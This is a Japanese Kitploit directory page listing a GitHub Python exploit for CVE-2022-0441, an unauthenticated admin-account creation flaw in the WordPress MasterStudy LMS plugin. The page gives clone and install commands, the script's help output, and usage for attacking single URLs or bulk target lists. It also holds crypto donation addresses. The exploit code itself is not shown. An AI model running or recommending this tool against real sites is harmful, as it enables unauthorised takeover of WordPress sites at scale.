Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-0441 — WordPressプラグイン MasterStudy LMS 2.7.5 - 認証されていない管理者アカウント作成 | Kitploit
ツール/GitHubGitHub/biulove0x/cve-2022-0441
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHubbiulove0x/cve-2022-0441

CVE-2022-0441

WordPressプラグイン MasterStudy LMS 2.7.5 - 認証されていない管理者アカウント作成

リポジトリを見る
614年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-0441

made-with-python

root@kitploit:~
Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
Date: 16.02.2022
Author: Numan Türle
CVE: CVE-2022-0441
Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
Version: <2.7.6

インストール

root@kitploit:~
git clone https://github.com/biulove0x/CVE-2022-0441.git
cd CVE-2022-0441/
python3 -m pip install -r requirements.txt

自動エクスプロイトの実行方法

root@kitploit:~
$ python3 MasterStudy.py --help
###############################################
# @author : biulove0x                         #
# @name   : WP Plugins Master Study Exploiter #
# @cve    : CVE-2022-0441                     #
###############################################

usage: MasterStudy.py [-h] [-t example.com] [-l target.txt]

CVE-2022-0441 [ WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation ]

optional arguments:
  -h, --help      show this help message and exit
  -t example.com  Single target
  -l target.txt   Multiple target

単一ターゲット

root@kitploit:~
$ python3 MasterStudy.py -t http://example.com/

複数ターゲット

root@kitploit:~
$ cat domains.txt
http://example.com/
https://examples.com/

$ python3 MasterStudy.py -l target.txt

参考文献 :

  • https://www.exploit-db.com/exploits/50752
  • https://www.youtube.com/watch?v=SI_O6CHXMZk
  • https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
  • https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed

寄付 :

BTC : bc1qst09sxcnq97a4wgsqvpkg4fxyjczvs3xe7278h

BNB : bnb1jhp2hv9utr8u97387p35fmftgr8wpjp39altz0

"コーヒーを一杯ご馳走になる"

ツールをダウンロード